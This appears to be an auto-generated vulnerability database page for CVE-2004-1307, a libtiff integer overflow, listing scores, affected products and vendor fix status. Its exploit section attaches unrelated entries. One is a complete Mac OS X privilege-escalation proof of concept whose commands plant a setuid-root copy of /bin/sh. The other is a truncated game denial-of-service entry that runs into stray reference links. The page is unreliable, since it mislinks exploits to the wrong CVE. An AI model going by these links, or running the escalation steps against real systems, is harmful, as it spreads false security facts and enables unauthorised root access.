CVE-2004-1307
Published 2004-12-21
CVE-2004-1307: Integer overflow in the TIFFFetchStripThing function in tif_dirread.c for libtiff 3.6.1 allows remote attackers to execute arbitrary code via a TIFF file with…
Priority: P3 · 36 · high · 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS: 6.34% (92.8th percentile)
Integer overflow in the TIFFFetchStripThing function in tif_dirread.c for libtiff 3.6.1 allows remote attackers to execute arbitrary code via a TIFF file with the STRIPOFFSETS flag and a large number of strips, which causes a zero byte buffer to be allocated and leads to a heap-based buffer overflow.
Affected
57 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | mac_os_x | — | — |
| apple | mac_os_x_server | — | — |
| avaya | call_management_system_server | — | — |
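CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | — | 7.5 | HIGH | — |
| vendor_debian | — | 7.5 | LOW | — |
| vendor_redhat | — | 5.0 | MEDIUM | — |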
Red Hat
security flaw
vendor_redhat·2004-12-21·CVSS 5.0
CVE-2004-1307 [MEDIUM] security flaw
Statement: This issue was resolved in all affected libtiff versions as shipped with Red Hat Enterprise Linux 2.1, 3, and 4 via a patch for CVE-2004-0886. For updates containing patches for CVE-2004-0886, see: https://rhn.redhat.com/errata/CVE-2004-0886.html
Debian
CVE-2004-1307: tiff - Integer overflow in the TIFFFetchStripThing function in tif_dirread.c for libtif...
vendor_debian·2004·CVSS 7.5
CVE-2004-1307 [HIGH] CVE-2004-1307: tiff - Integer overflow in the TIFFFetchStripThing function in tif_dirread.c for libtif...
Scope: local
bookworm: resolved (fixed in 3.7.0)
bullseye: resolved (fixed in 3.7.0)
forky: resolved (fixed in 3.7.0)
sid: resolved (fixed in 3.7.0)
trixie: resolved (fixed in 3.7.0)
GHSA
GHSA-j2r4-vwhq-m2gg: Integer overflow in the TIFFFetchStripThing function in tif_dirread
ghsa_unreviewed·2022-04-29
CVE-2004-1307 [HIGH] GHSA-j2r4-vwhq-m2gg: Integer overflow in the TIFFFetchStripThing function in tif_dirread
OSV
CVE-2004-1307: Integer overflow in the TIFFFetchStripThing function in tif_dirread
osv·2004-12-21·CVSS 7.5
CVE-2004-1307 [HIGH] CVE-2004-1307: Integer overflow in the TIFFFetchStripThing function in tif_dirread
No detection rules found.
Exploit-DB
Apple Mac OSX Adobe Version Cue - Local Privilege Escalation
exploitdb·2004-12-08
CVE-2005-1307 Apple Mac OSX Adobe Version Cue - Local Privilege Escalation
---
Proof of concept:
haven:~ fintler$ cd ~
haven:~ fintler$ id
uid=502(fintler) gid=500(fintler) groups=500(fintler)
haven:~ fintler$ echo "cp /bin/sh /Users/$USER;chmod 4755
/Users/$USER/sh;chown root /Users/$USER/sh" > productname.sh
haven:~ fintler$ chmod 0755 ./productname.sh
haven:~ fintler$ ln -s /Applications/Adobe\ Version\ Cue/stopserver.sh .
haven:~ fintler$ ./stopserver.sh
Stopping ...
./stopserver.sh: line 21: ./tomcat/bin/shutdown.sh: No such file or directory
No matching processes belonging to you were found
haven:~ fintler$ ./sh
sh-2.05b# id
uid=502(fintler) euid=0(root) gid=500(fintler) groups=500(fintler)
sh-2.05b# whoami
root
sh-2.05b#
# milw0rm.com [2004-12-08]
Exploit-DB
Star Wars Battlefront 1.1 - Fake Players Denial of Service
exploitdb·2004-11-24
CVE-2004-1195 Star Wars Battlefront 1.1 - Fake Players Denial of Service
---
/*
Copyright 2004 Luigi Auriemma
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
http://www.gnu.org/licenses
http://lists.apple.com/archives/security-announce/2005/May/msg00001.html
http://sunsolve.sun.com/search/document.do?assetkey=1-26-101677-1
http://sunsolve.sun.com/search/document.do?assetkey=1-66-201072-1
http://www.idefense.com/application/poi/display?id=173&type=vulnerabilities&flashstatus=true
http://www.kb.cert.org/vuls/id/539110
http://www.us-cert.gov/cas/techalerts/TA05-136A.html
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11175